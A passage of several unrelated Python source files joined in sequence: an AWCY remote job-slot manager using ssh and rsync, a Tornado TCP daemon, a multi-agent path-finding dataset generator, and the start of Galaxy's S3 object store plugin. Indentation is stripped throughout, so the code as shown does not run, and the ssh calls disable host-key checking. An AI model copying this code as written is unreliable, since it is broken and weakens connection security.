# does not interpret the parentheses. Paths containing a single quote, such as
# `du_Parterre_d'Eau`, must be converted into
# `'du_Parterre_d'"'"'Eau'`
# so that the embedded `'` survives the quoting.
def shellquote(s):
return "'" + s.replace("'", "'\"'\"'") + "'"
class Machine:
def __init__(self,host,user='ec2-user',cores=18,work_root='/home/ec2-user',port=22,media_path='/mnt/media'):
self.host = host
self.user = user
self.cores = cores
self.work_root = work_root
self.port = str(port)
self.media_path = media_path
self.log = None
self.slots = []
def rsync(self, local, remote):
return subprocess.call(['rsync', '-r', '-e', "ssh -i "+ssh_privkey_file+" -o StrictHostKeyChecking=no -p "+str(self.port), local, self.user + '@' + self.host + ':' + remote])
def check_shell(self, command):
return subprocess.check_output(['ssh','-i',ssh_privkey_file,'-p',self.port,'-o',' StrictHostKeyChecking=no',
self.user+'@'+self.host,
command.encode("utf-8")])
def get_slots(self):
slots = []
#by doing the machines in the inner loop,
#we end up with heavy jobs split across machines better
for i in range(0,self.cores):
slots.append(Slot(self, i, self.log))
self.slots = slots
return slots
def get_name(self):
return self.host
class SlotProcess:
def __init__(self, log):
self.p = None
self.can_kill = threading.Event()
self.log = log
def kill(self):
# wait until there is actually a process to kill
success = self.can_kill.wait(20)
if not success:
rd_print(self.log,"Waited too long for process to kill.")
if self.p:
rd_print(self.log,"Will try to kill anyway.")
else:
rd_print(self.log,"Aborting kill.")
return
try:
self.p.kill()
except Exception as e:
rd_print(self.log,"Couldn't cancel work item",e)
def communicate(self):
return self.p.communicate()
def shell(self, args):
self.p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.can_kill.set()
#the job slots we can fill
class Slot:
def __init__(self, machine, num, log):
self.machine = machine
self.work_root = machine.work_root + '/slot' + str(num)
self.p = None
self.busy = False
self.work = None
self.log = log
self.can_kill = None
def gather(self):
return self.p.communicate()
def start_work(self, work):
self.work = work
work.slot = self
self.p = SlotProcess(self.log)
work_thread = threading.Thread(target=self.execute)
work_thread.daemon = True
self.busy = True
work_thread.start()
def clear_work(self):
if self.work:
self.work.slot = None
self.work = None
def execute(self):
try:
self.work.execute()
except Exception as e:
rd_print(self.log, e)
self.work.failed = True
self.busy = False
def setup(self,codec,bindir):
time.sleep(1)
try:
self.check_shell('mkdir -p '+shellquote(self.work_root))
time.sleep(1)
self.check_shell('rm -f '+shellquote(self.work_root)+'/*.y4m '+shellquote(self.work_root)+'/*.ivf')
time.sleep(1)
except subprocess.CalledProcessError as e:
rd_print(self.log,e.output)
rd_print(self.log,'Couldn\'t connect to machine '+self.machine.host)
raise RuntimeError('This is a bug with AWCY. Likely this machine has gone unreachable.')
if self.machine.rsync('./',self.work_root+'/rd_tool/') != 0:
rd_print(self.log,'Couldn\'t set up machine '+self.machine.host)
raise RuntimeError('Couldn\'t copy tools to machine (out of disk space?)')
time.sleep(1)
self.check_shell('rm -rf '+shellquote(self.work_root+'/'+codec))
for binary in binaries[codec]:
time.sleep(1)
self.check_shell('mkdir -p '+shellquote(self.work_root+'/'+codec+'/'+os.path.dirname(binary)))
time.sleep(1)
if self.machine.rsync(bindir+'/'+binary,self.work_root+'/'+codec+'/'+binary) != 0:
rd_print(self.log,'Couldn\'t upload codec binary '+binary+' to '+self.machine.host)
raise RuntimeError('Couldn\'t upload codec binary')
def start_shell(self, command):
self.p.shell(['ssh','-i',ssh_privkey_file,'-p',self.machine.port,'-o',' StrictHostKeyChecking=no', self.machine.user+'@'+self.machine.host,
command.encode("utf-8")])
def kill(self):
kill_thread = threading.Thread(target=self.p.kill)
kill_thread.daemon = True
kill_thread.start()
def get_file(self, remote, local):
return subprocess.call(['scp','-i',ssh_privkey_file,'-P',self.machine.port,self.machine.user+'@'+self.machine.host+':'+shellquote(remote),local])
def check_shell(self, command):
return subprocess.check_output(['ssh','-i',ssh_privkey_file,'-p',self.machine.port,'-o',' StrictHostKeyChecking=no',
self.machine.user+'@'+self.machine.host,
command.encode("utf-8")])
|
__init__.py
|
# -*- coding: utf-8 -*-
# vim: set expandtab shiftwidth=4:
__import__('gevent.monkey').monkey.patch_all()
import time
import logging
import threading
from tornado.ioloop import IOLoop
from tornado.tcpserver import TCPServer
from daemon.simpledaemon import SimpleDaemon
from utils.server.tornado import TornadoDaemonBackend
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s - - %(asctime)s %(message)s', datefmt='[%d/%b/%Y %H:%M:%S]')
## New connection activity:
class newConnection(object):
stream_set = set([])
def __init__(self, server, stream, address, commands=None):
logging.debug('Received a new connection from %s', address)
self.server = server
self.stream = stream
self.address = address
self.commands = commands
self.stream_set.add(self.stream)
self.stream.set_close_callback(self._on_close)
self.stream.read_until('\n', self._on_read_line)
def _on_read_line(self, data):
logging.info('Command from %s: %s' % (self.address, data))
#for stream in self.stream_set:
# stream.write(data, self._on_write_complete)
if self.commands is not None:
self.commands.process(self, data)
## Write answer complete, wait for another command:
def _on_write_complete(self):
logging.info('Write answer to %s', self.address)
if not self.stream.reading():
self.stream.read_until('\n', self._on_read_line)
def _on_close(self):
logging.info('client quit %s', self.address)
self.stream_set.remove(self.stream)
def write(self, data, on_complete=None):
self.stream.write(data, on_complete)
def background(f):
"""
a threading decorator
use @background above the function you want to thread
(run in the background)
"""
def bg_f(*a, **kw):
threading.Thread(target=f, args=a, kwargs=kw).start()
return bg_f
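# Illustrative sketch of how the decorator above could be used; `poll_status`
# is a hypothetical function, not something defined in this module:
# >>> @background
# ... def poll_status(interval):
# ...     time.sleep(interval)
# >>> poll_status(5)  # returns immediately; the body runs in a separate thread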
class TornadoTCPDaemonServer(TCPServer):
port = 5555 ## Default port
host = None
commands = None
def __init__(self, io_loop=None, ssl_options=None, **kwargs):
io_loop = io_loop or IOLoop.instance()
self.is_exit = False
super(TornadoTCPDaemonServer, self).__init__(io_loop=io_loop, ssl_options=ssl_options, **kwargs)
def handle_stream(self, stream, address):
newConnection(self, stream, address, self.commands)
def run_every_time(self):
while True:
if self.is_exit:
break
time.sleep(1)
def stop(self):
self.is_exit = True
class TornadoTCPDaemonBackend(TornadoDaemonBackend):
def __init__(self, server):
self.server_class = server
@background
def run_every_time(self):
self.server.run_every_time()
def run(self):
self.server = self.server_class()
largs = {}
if self.server_class.host is not None:
largs['address'] = self.server_class.host
self.server.listen(self.server_class.port, **largs)
logging.info("Listen TCP: %s:%s" % (self.server_class.host, self.server_class.port))
self.run_every_time()
def stop(self):
self.server.stop()
|
CasesSolver_mapRanking.py
|
import os
import cv2
import sys
import time
import yaml
import random
import signal
import argparse
import itertools
import subprocess
import numpy as np
import matplotlib.cm as cm
import drawSvg as draw
import scipy.io as sio
from PIL import Image
from multiprocessing import Queue, Pool, Lock, Manager, Process
from os.path import dirname, realpath, pardir
os.system("taskset -p -c 0 %d" % (os.getpid()))
# os.system("taskset -p 0xFFFFFFFF %d" % (os.getpid()))
os.system("taskset -p -c 8-15,24-31 %d" % (os.getpid()))
parser = argparse.ArgumentParser("Input width and #Agent")
parser.add_argument('--map_width', type=int, default=10)
parser.add_argument('--map_density', type=float, default=0.1)
parser.add_argument('--map_complexity', type=float, default=0.01)
parser.add_argument('--num_agents', type=int, default=4)
parser.add_argument('--num_dataset', type=int, default=30000)
parser.add_argument('--random_map', action='store_true', default=False)
parser.add_argument('--gen_CasePool', action='store_true', default=False)
parser.add_argument('--chosen_solver', type=str, default='ECBS')
parser.add_argument('--num_caseSetup_pEnv', type=int, default=100)
parser.add_argument('--path_loadmap', type=str, default='../MultiAgentDataset/Solution_BMap/Storage_Map/BenchMarkMap')
parser.add_argument('--loadmap_TYPE', type=str, default='maze')
parser.add_argument('--path_save', type=str, default='../MultiAgentDataset/Solution_DMap')
args = parser.parse_args()
# set random seed
np.random.seed(1337)
def tf_index2xy(num_col, index):
Id_row = index // num_col
Id_col = np.remainder(index, num_col)
return [Id_row, Id_col]
# return Id_col, Id_row
def tf_xy2index(num_col, i, j):
return i * num_col + j
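# Illustrative sanity check of the row-major index helpers above:
# >>> tf_index2xy(5, 7)   # 7 // 5 = row 1, 7 % 5 = col 2
# [1, 2]
# >>> tf_xy2index(5, 1, 2)
# 7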
def handler(signum, frame):
raise Exception("Solution computed by Expert is timeout.")
class CasesGen:
def __init__(self, config):
self.config = config
self.random_map = config.random_map
self.min_len_path = 10
print(self.random_map)
self.path_loadmap = config.path_loadmap
self.num_agents = config.num_agents
self.num_data = config.num_dataset
self.path_save = config.path_save
if self.config.random_map:
self.map_density = config.map_density
self.label_density = str(config.map_density).split('.')[-1]
self.map_TYPE = 'map'
self.size_load_map = (config.map_width, config.map_width)
self.map_complexity = config.map_complexity
self.createFolder()
else:
# self.list_path_loadmap = self.search_Cases(os.path.join(self.path_loadmap, self.config.loadmap_TYPE), '.map')
self.list_path_loadmap = self.search_Cases(os.path.join(self.path_loadmap, self.config.loadmap_TYPE),
'.yaml')
if self.config.loadmap_TYPE=='free':
self.map_TYPE = 'map'
self.map_density = 0
self.label_density = '0'
self.size_load_map = (config.map_width, config.map_width)
self.map_complexity = int(0)
self.createFolder_()
self.pair_CasesPool = []
self.PROCESS_NUMBER = 4
self.timeout = 300
self.task_queue = Queue()
def createFolder_(self, id_env=0):
self.dirName_root = os.path.join(self.path_save,'{}{:02d}x{:02d}_density_p{}/IDMap{}/{}_Agent/'.format(self.map_TYPE, self.size_load_map[0],
self.size_load_map[1],
self.label_density, id_env,
self.num_agents))
self.dirName_input = os.path.join(self.dirName_root, 'input/')
self.dirName_mapSet = os.path.join(self.dirName_root, 'mapSet/')
try:
# Create target Directory
os.makedirs(self.dirName_root)
print("Directory ", self.dirName_root, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
try:
# Create target Directory
os.makedirs(self.dirName_input)
os.makedirs(self.dirName_mapSet)
print("Directory ", self.dirName_input, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
def createFolder(self, id_env=0):
self.dirName_root = os.path.join(self.path_save,
'{}{:02d}x{:02d}_density_p{}/IDMap{:05d}/{}_Agent/'.format(self.map_TYPE,
self.size_load_map[0],
self.size_load_map[1],
self.label_density,id_env,
self.num_agents))
self.dirName_input = os.path.join(self.dirName_root, 'input/')
self.dirName_mapSet = os.path.join(self.dirName_root, 'mapSet/')
try:
# Create target Directory
os.makedirs(self.dirName_root)
print("Directory ", self.dirName_root, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
try:
# Create target Directory
os.makedirs(self.dirName_input)
os.makedirs(self.dirName_mapSet)
print("Directory ", self.dirName_input, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
def resetFolder(self):
# self.list_path_loadmap
self.dirName_root = os.path.join(self.path_save,
'{}{:02d}x{:02d}_density_p{}/{}_Agent/'.format(self.map_TYPE,
self.size_load_map[0],
self.size_load_map[1],
self.label_density,
self.num_agents))
self.dirName_input = os.path.join(self.dirName_root, 'input/')
self.dirName_mapSet = os.path.join(self.dirName_root, 'mapSet/')
def search_Cases(self, dir, DATA_EXTENSIONS='.yaml'):
# make a list of file name of input yaml
list_path = []
assert os.path.isdir(dir), '%s is not a valid directory' % dir
for root, _, fnames in sorted(os.walk(dir)):
for fname in fnames:
if self.is_target_file(fname,DATA_EXTENSIONS):
path = os.path.join(root, fname)
list_path.append(path)
return list_path
def is_target_file(self, filename, DATA_EXTENSIONS='.yaml'):
# DATA_EXTENSIONS = ['.yaml']
return any(filename.endswith(extension) for extension in DATA_EXTENSIONS)
def mapGen(self, width=10, height=10, complexity=0.01, density=0.1):
# Only odd shapes
# world_size = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)
# world_size = ((height // 2) * 2 , (width // 2) * 2 )
world_size = (height, width)
# Adjust complexity and density relative to maze size
# number of components
complexity = int(complexity * (5 * (world_size[0] + world_size[1])))
# size of components
density = int(density * ((world_size[0] // 2) * (world_size[1] // 2)))
# density = int(density * world_size[0] * world_size[1])
# Build actual maze
maze = np.zeros(world_size, dtype=np.int64)
# Make aisles
for i in range(density):
# x, y = np.random.randint(0, world_size[1]), np.random.randint(0, world_size[0])
# pick a random position
x, y = np.random.randint(0, world_size[1] // 2) * 2, np.random.randint(0, world_size[0] // 2) * 2
maze[y, x] = 1
for j in range(complexity):
neighbours = []
if x > 1: neighbours.append((y, x - 2))
if x < world_size[1] - 2: neighbours.append((y, x + 2))
if y > 1: neighbours.append((y - 2, x))
if y < world_size[0] - 2: neighbours.append((y + 2, x))
if len(neighbours):
y_, x_ = neighbours[np.random.randint(0, len(neighbours))]
if maze[y_, x_] == 0:
maze[y_, x_] = 1
maze[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 1
x, y = x_, y_
# print(np.count_nonzero(maze))
return maze
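# Illustrative call of the generator above (assuming `gen` is an existing
# CasesGen instance); it returns a (height, width) int64 array of 0s and 1s:
# >>> maze = gen.mapGen(width=10, height=10, complexity=0.01, density=0.1)
# >>> maze.shape
# (10, 10)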
def img_fill(self, im_in, n): # n = binary image threshold
th, im_th = cv2.threshold(im_in, n, 1, cv2.THRESH_BINARY)
# Copy the thresholded image.
im_floodfill = im_th.copy()
# Mask used to flood filling.
# Notice the size needs to be 2 pixels larger than the image.
h, w = im_th.shape[:2]
mask = np.zeros((h + 2, w + 2), np.uint8)
# Floodfill from point (0, 0)
cv2.floodFill(im_floodfill, mask, (int(w/2), int(h/2)), 255)
# Invert floodfilled image
im_floodfill_inv = cv2.bitwise_not(im_floodfill)
# print(im_floodfill_inv)
# Combine the two images to get the foreground.
fill_image = im_th | im_floodfill_inv
return fill_image
def mapload(self, id_env):
load_env = self.path_loadmap + 'map_{:02d}x{:02d}_density_p{}_id_{:02d}.npy'.format(self.size_load_map[0], self.size_load_map[1],
self.map_density, id_env)
map_env = np.load(load_env)
return map_env
def load_benchmarkMap(self, id_env):
filename = self.list_path_loadmap[id_env]
f = open(filename, 'r')
map_type = f.readline()
height = int(f.readline().split('height')[-1])
width = int(f.readline().split('width')[-1])
f.readline()
map_array = np.zeros([width, height])
for h in range(height):
char_row = f.readline()
for w in range(width):
if char_row[w] == '@':
map_array[h, w] = 1
return map_array
def load_benchmarkMap_yaml(self, id_env):
filename = self.list_path_loadmap[id_env]
with open(filename, 'r') as stream:
try:
# print(yaml.safe_load(stream))
data_config = yaml.safe_load(stream)
except yaml.YAMLError as exc:
print(exc)
list_posObstacle = data_config['map']['obstacles']
if list_posObstacle is None:
# No obstacles listed in the yaml, so treat the whole map as free space.
map_array = np.zeros(self.size_load_map, dtype=np.int64)
else:
map_array = self.setup_map_array(list_posObstacle)
return map_array
def setup_map_array(self, list_posObstacle):
num_obstacle = len(list_posObstacle)
map_data = np.zeros(self.size_load_map)
for ID_obs in range(num_obstacle):
obstacleIndexX = list_posObstacle[ID_obs][0]
obstacleIndexY = list_posObstacle[ID_obs][1]
map_data[obstacleIndexX][obstacleIndexY] = 1
return map_data
def setup_map(self, id_random_env, num_cases_PEnv):
if self.random_map:
# randomly generate map with specific setup
map_env_raw = self.mapGen(width=self.size_load_map[0], height=self.size_load_map[1],
complexity=self.map_complexity, density=self.map_density)
else:
# map_env_raw = self.mapload(id_random_env)
# map_env_raw = self.load_benchmarkMap(id_random_env)
map_env_raw = self.load_benchmarkMap_yaml(id_random_env)
map_env = self.img_fill(map_env_raw.astype(np.uint8), 0.5)
array_freespace = np.argwhere(map_env == 0)
num_freespace = array_freespace.shape[0]
array_obstacle = np.transpose(np.nonzero(map_env))
num_obstacle = array_obstacle.shape[0]
if num_freespace == 0:
# if num_freespace == 0 or num_obstacle == 0:
# print(array_freespace)
map_env = self.setup_map(id_random_env, num_cases_PEnv)
return map_env
def setup_cases(self, id_random_env, num_cases_PEnv):
# Randomly generate certain number of unique cases in same map
(id_env, id_Env_label) = id_random_env
# print(map_env)
if self.config.loadmap_TYPE == 'free':
map_env = np.zeros(self.size_load_map, dtype=np.int64)
else:
map_env = self.setup_map(id_env, num_cases_PEnv)
self.size_load_map = np.shape(map_env)
array_freespace = np.argwhere(map_env == 0)
num_freespace = array_freespace.shape[0]
array_obstacle = np.transpose(np.nonzero(map_env))
num_obstacle = array_obstacle.shape[0]
print(
"###### Check Map Size: [{},{}]- density: {} - Actual [{},{}] - #Obstacle: {}".format(self.size_load_map[0],
self.size_load_map[1],
self.map_density,
self.size_load_map[0],
self.size_load_map[1],
num_obstacle))
# time.sleep(3)
list_freespace = []
list_obstacle = []
# transfer into list (tuple)
for id_FS in range(num_freespace):
list_freespace.append((array_freespace[id_FS, 0], array_freespace[id_FS, 1]))
for id_Obs in range(num_obstacle):
list_obstacle.append((array_obstacle[id_Obs, 0], array_obstacle[id_Obs, 1]))
# print(list_freespace)
pair_CaseSet_PEnv = []
pairStore = []
pair_agent = list(itertools.combinations(range(self.num_agents), 2))
num_cases_PEnv_exceed = int(5 * num_cases_PEnv)
for _ in range(num_cases_PEnv_exceed):
pairset = []
for id_agents in range(self.num_agents):
# ID_cases_agent = random.sample(list_freespace, 2)
temp_pair = random.sample(list_freespace, 2)
ID_cases_agent = self.check_heuristic(temp_pair, list_freespace)
# dist_pair = self.cal_heuristic(ID_cases_agent[0], ID_cases_agent[1])
# print(dist_pair)
pairset.append(ID_cases_agent)
pair_CaseSet_PEnv.append(pairset)
for pair_CaseSet in pair_CaseSet_PEnv:
check_condition = []
for id_pairagent in range(len(pair_agent)):
firstAgent = pair_agent[id_pairagent][0]
secondAgent = pair_agent[id_pairagent][1]
# print("pair", pairset)
if pair_CaseSet[firstAgent][0] == pair_CaseSet[secondAgent][0] or pair_CaseSet[firstAgent][1] == \
pair_CaseSet[secondAgent][1]:
print("Remove pair \t", pair_CaseSet)
check_condition.append(0)
else:
check_condition.append(1)
# pairStore.append(pairset)
if sum(check_condition) == len(pair_agent):
pairStore.append(pair_CaseSet)
# print("Remove cases ID-{}:\t {}".format(id_random_env, pair_CaseSet))
# todo: generate n-agent pair start-end position - start from single agent CBS
# todo: non-swap + swap
for initialCong in pairStore:
count_repeat = pairStore.count(initialCong)
if count_repeat > 1:
id_repeat = pairStore.index(initialCong)
pairStore.remove(initialCong)
print('Repeat cases ID {} from ID#{} Map:{}\n'.format(id_repeat, id_Env_label, pairStore[id_repeat]))
CasePool = pairStore[:num_cases_PEnv]
### Version 2 ##
### stack cases with same envs into a pool
random.shuffle(CasePool)
random.shuffle(CasePool)
self.save_CasePool(CasePool, id_Env_label, list_obstacle)
self.saveMap(id_Env_label,list_obstacle)
def check_heuristic(self, pair, list_freespace):
dist_pair = self.cal_heuristic(pair[0],pair[1])
# print(dist_pair)
if dist_pair>=self.min_len_path:
return pair
else:
pair = random.sample(list_freespace, 2)
return self.check_heuristic(pair, list_freespace)
def cal_heuristic(self, current_pos, goal):
value = abs(goal[0] - current_pos[0]) + abs(goal[1] - current_pos[1])
return value
def saveMap(self,Id_env,list_obstacle):
num_obstacle = len(list_obstacle)
map_data = np.zeros([self.size_load_map[0], self.size_load_map[1]])
aspect = self.size_load_map[0] / self.size_load_map[1]
xmin = -0.5
ymin = -0.5
xmax = self.size_load_map[0] - 0.5
ymax = self.size_load_map[1] - 0.5
d = draw.Drawing(self.size_load_map[0], self.size_load_map[1], origin=(xmin,ymin))
# d.append(draw.Rectangle(xmin, ymin, self.size_load_map[0], self.size_load_map[1], stroke='black',fill = 'white'))
# d.append(draw.Rectangle(xmin, ymin, xmax, ymax, stroke_width=0.1, stroke='black', fill='white'))
d.append(draw.Rectangle(xmin, ymin, self.size_load_map[0], self.size_load_map[1], stroke_width=0.1, stroke='black', fill='white'))
# d = draw.Drawing(self.size_load_map[0], self.size_load_map[1], origin=(0, 0))
# d.append(draw.Rectangle(0, 0, self.size_load_map[0], self.size_load_map[1], stroke_width=0, stroke='black', fill='white'))
for ID_obs in range(num_obstacle):
obstacleIndexX = list_obstacle[ID_obs][0]
obstacleIndexY = list_obstacle[ID_obs][1]
map_data[obstacleIndexX][obstacleIndexY] = 1
d.append(draw.Rectangle(obstacleIndexY-0.5, obstacleIndexX-0.5, 1, 1, stroke='black', stroke_width=0, fill='black'))
# d.append(draw.Rectangle(obstacleIndexX, obstacleIndexY, 0.5, 0.5, stroke='black', fill='black'))
# d.append(draw.Rectangle(obstacleIndexX - 0.5, obstacleIndexY - 0.5, 1, 1, stroke='black', stroke_width=1,
# fill='black'))
# setup figure
name_map = os.path.join(self.dirName_mapSet, 'IDMap{:05d}.png'.format(Id_env))
# d.setPixelScale(2) # Set number of pixels per geometry unit
d.setRenderSize(200, 200) # Alternative to setPixelScale
d.savePng(name_map)
# print(map_data)
# pass
# img = Image.fromarray(map_data)
# if img.mode != '1':
# img = img.convert('1')
# img.save(name_map)
def setup_CasePool(self):
num_data_exceed = int(self.num_data)
num_cases_PEnv = self.config.num_caseSetup_pEnv
num_Env = int(round(num_data_exceed / num_cases_PEnv))
# print(num_Env)
for id_random_env in range(num_Env):
# print(id_random_env)
self.setup_cases(id_random_env, num_cases_PEnv)
def get_numEnv(self):
return len(self.list_path_loadmap)
def setup_CasePool_(self, id_env):
filename = self.list_path_loadmap[id_env]
print(filename)
map_width = int(filename.split('{}-'.format(self.config.loadmap_TYPE))[-1].split('-')[0])
self.map_TYPE = self.config.loadmap_TYPE
self.size_load_map = (map_width, map_width)
self.label_density = int(
filename.split('{}-'.format(self.config.loadmap_TYPE))[-1].split('-')[-1].split('.map')[0])
self.map_density = int(self.label_density)
self.createFolder()
num_cases_PEnv = self.config.num_caseSetup_pEnv #int(round(num_data_exceed / num_Env))
# print(num_Env)
self.setup_cases(id_env, num_cases_PEnv)
def setup_CasePool_yaml(self, id_env):
filename = self.list_path_loadmap[id_env]
print(filename)
map_width = int(filename.split('{}-'.format(self.config.loadmap_TYPE))[-1].split('-')[0])
self.map_TYPE = self.config.loadmap_TYPE
self.size_load_map = (map_width, map_width)
self.label_density = int(
filename.split('{}-'.format(self.config.loadmap_TYPE))[-1].split('-')[-1].split('_ID')[0])
id_Env_label = int(filename.split("_ID")[-1].split(".yaml")[0])
self.map_density = int(self.label_density)
self.createFolder_(id_Env_label)
num_cases_PEnv = self.config.num_caseSetup_pEnv #int(round(num_data_exceed / num_Env))
# print(num_Env)
Index_env = (id_env, id_Env_label)
# print(Index_env)
# time.sleep(10)
self.setup_cases(Index_env, num_cases_PEnv)
def save_CasePool(self, pairPool, ID_env, env):
for id_case in range(len(pairPool)):
inputfile_name = self.dirName_input + \
'input_map{:02d}x{:02d}_IDMap{:05d}_IDCase{:05d}.yaml'.format(self.size_load_map[0], self.size_load_map[1],ID_env,
id_case)
self.dump_yaml(self.num_agents, self.size_load_map[0], self.size_load_map[1],
pairPool[id_case], env, inputfile_name)
def dump_yaml(self, num_agent, map_width, map_height, agents, obstacle_list, filename):
f = open(filename, 'w')
f.write("map:\n")
f.write(" dimensions: {}\n".format([map_width, map_height]))
f.write(" obstacles:\n")
for id_Obs in range(len(obstacle_list)):
f.write(" - [{}, {}]\n".format(obstacle_list[id_Obs][0], obstacle_list[id_Obs][1]))
f.write("agents:\n")
for n in range(num_agent):
# f.write(" - name: agent{}\n start: {}\n goal: {}\n".format(n, agents[n][0], agents[n][1]))
# f.write(" - name: agent{}\n start: {}\n goal: {}\n".format(n, agents[n]['start'], agents[n]['goal']))
f.write(" - name: agent{}\n start: [{}, {}]\n goal: [{}, {}]\n".format(n, agents[n][0][0],
agents[n][0][1],
agents[n][1][0],
agents[n][1][1]))
f.close()
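# For reference, dump_yaml above writes input files shaped roughly like this
# (the concrete values are illustrative only):
#   map:
#     dimensions: [10, 10]
#     obstacles:
#       - [3, 4]
#   agents:
#     - name: agent0
#       start: [0, 0]
#       goal: [9, 9]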
def computeSolution(self, chosen_solver):
self.list_Cases_input = self.search_Cases(self.dirName_input)
self.list_Cases_input = sorted(self.list_Cases_input)
self.len_pair = len(self.list_Cases_input)
self.dirName_output = os.path.join(self.dirName_root,'output_{}/'.format(chosen_solver))
try:
# Create target Directory
os.makedirs(self.dirName_output)
print("Directory ", self.dirName_output, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
for id_case in range(self.len_pair):
self.task_queue.put(id_case)
time.sleep(0.3)
processes = []
for i in range(self.PROCESS_NUMBER):
# Run Multiprocesses
p = Process(target=self.compute_thread, args=(str(i), chosen_solver))
processes.append(p)
[x.start() for x in processes]
def compute_thread(self, thread_id, chosen_solver):
while True:
try:
# print(thread_id)
id_case = self.task_queue.get(block=False)
print('thread {} get task:{}'.format(thread_id, id_case))
self.runExpertSolver(id_case, chosen_solver)
# print('thread {} finish task:{}'.format(thread_id, id_case))
except:
# print('thread {} no task, exit'.format(thread_id))
return
def runExpertSolver(self, id_case, chosen_solver):
signal.signal(signal.SIGALRM, handler)
signal.alarm(self.timeout)
try:
# load
name_inputfile = self.list_Cases_input[id_case]
id_input_map = name_inputfile.split('_IDMap')[-1].split('_IDCase')[0]
id_input_case = name_inputfile.split('_IDCase')[-1].split('.yaml')[0]
name_outputfile = self.dirName_output + 'output_map{:02d}x{:02d}_IDMap{}_IDCase{}_{}.yaml'.format(self.size_load_map[0],
self.size_load_map[1],id_input_map,
id_input_case, chosen_solver)
command_dir = dirname(realpath(__file__))
# print(command_dir)
# command_dir = '/local/scratch/ql295/Data/Project/GraphNeural_Planner/onlineExpert'
# print(name_inputfile)
# print(name_outputfile)
if chosen_solver.upper() == "ECBS":
command_file = os.path.join(command_dir, "ecbs")
# run ECBS
subprocess.call(
[command_file,
"-i", name_inputfile,
"-o", name_outputfile,
"-w", str(1.1)],
cwd=command_dir)
elif chosen_solver.upper() == "CBS":
command_file = os.path.join(command_dir, "cbs")
subprocess.call(
[command_file,
"-i", name_inputfile,
"-o", name_outputfile],
cwd=command_dir)
elif chosen_solver.upper() == "SIPP":
command_file = os.path.join(command_dir, "mapf_prioritized_sipp")
subprocess.call(
[command_file,
"-i", name_inputfile,
"-o", name_outputfile],
cwd=command_dir)
log_str = 'map{:02d}x{:02d}_{}Agents_#{}_in_IDMap_#{}'.format(self.size_load_map[0], self.size_load_map[1],
self.num_agents, id_input_case, id_input_map)
print('############## Find solution by {} for {} generated ###############'.format(chosen_solver,log_str))
with open(name_outputfile) as output_file:
return yaml.safe_load(output_file)
except Exception as e:
print(e)
if __name__ == '__main__':
path_savedata = '../Solution_DMap'
# num_dataset = 10 #16**2
# size_map = (5, 5)
dataset = CasesGen(args)
timeout = 300
if args.random_map:
path_loadmap = ''
if args.gen_CasePool:
dataset.setup_CasePool()
time.sleep(10)
dataset.computeSolution(args.chosen_solver)
else:
path_loadmap = args.path_loadmap
num_Env = dataset.get_numEnv()
# print(num_Env)
for id_Env in range(num_Env):
print('\n################## {} ####################\n'.format(id_Env))
# dataset.setup_CasePool_(id_Env)
dataset.setup_CasePool_yaml(id_Env)
time.sleep(10)
dataset.computeSolution(args.chosen_solver)
|
s3.py
|
"""
Object Store plugin for the Amazon Simple Storage Service (S3)
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectNotFound
from galaxy.util import string_as_bool, umask_fix_perms
from galaxy.util.directory_hash import directory_hash_id
from galaxy.util.sleeper import Sleeper
from .s3_multipart_upload import multipart_upload
from ..objectstore import ObjectStore, convert_bytes
try:
# Imports are done this way to allow objectstore code to be used outside of Galaxy.
import boto
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from boto.exception import S3ResponseError
except ImportError:
boto = None
NO_BOTO_ERROR_MESSAGE = ("S3/Swift object store configured, but no boto dependency available."
"Please install and properly configure boto or modify object store configuration.")
log = logging.getLogger( __name__ )
logging.getLogger('boto').setLevel(logging.INFO) # Otherwise boto is quite noisy
class S3ObjectStore(ObjectStore):
"""
Object store that stores objects as items in an AWS S3 bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and S3.
"""
def __init__(self, config, config_xml):
if boto is None:
raise Exception(NO_BOTO_ERROR_MESSAGE)
super(S3ObjectStore, self).__init__(config, config_xml)
self.config = config
self.staging_path = self.config.file_path
self.transfer_progress = 0
self._parse_config_xml(config_xml)
self._configure_connection()
self.bucket = self._get_bucket(self.bucket)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
def _configure_connection(self):
log.debug("Configuring S3 Connection")
self.conn = S3Connection(self.access_key, self.secret_key)
def _parse_config_xml(self, config_xml):
try:
a_xml = config_xml.findall('auth')[0]
self.access_key = a_xml.get('access_key')
self.secret_key = a_xml.get('secret_key')
b_xml = config_xml.findall('bucket')[0]
self.bucket = b_xml.get('name')
self.use_rr = string_as_bool(b_xml.get('use_reduced_redundancy', "False"))
self.max_chunk_size = int(b_xml.get('max_chunk_size', 250))
cn_xml = config_xml.findall('connection')
if not cn_xml:
cn_xml = {}
else:
cn_xml = cn_xml[0]
self.host = cn_xml.get('host', None)
self.port = int(cn_xml.get('port', 6000))
self.multipart = string_as_bool(cn_xml.get('multipart', 'True'))
self.is_secure = string_as_bool(cn_xml.get('is_secure', 'True'))
self.conn_path = cn_xml.get('conn_path', '/')
c_xml = config_xml.findall('cache')[0]
self.cache_size = float(c_xml.get('size', -1))
# for multipart upload
self.s3server = {'access_key': self.access_key,
'secret_key': self.secret_key,
'is_secure': self.is_secure,
'max_chunk_size': self.max_chunk_size,
'host': self.host,
'port': self.port,
'use_rr': self.use_rr,
'conn_path': self.conn_path}
except Exception:
# Toss it back up after logging, we can't continue loading at this point.
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
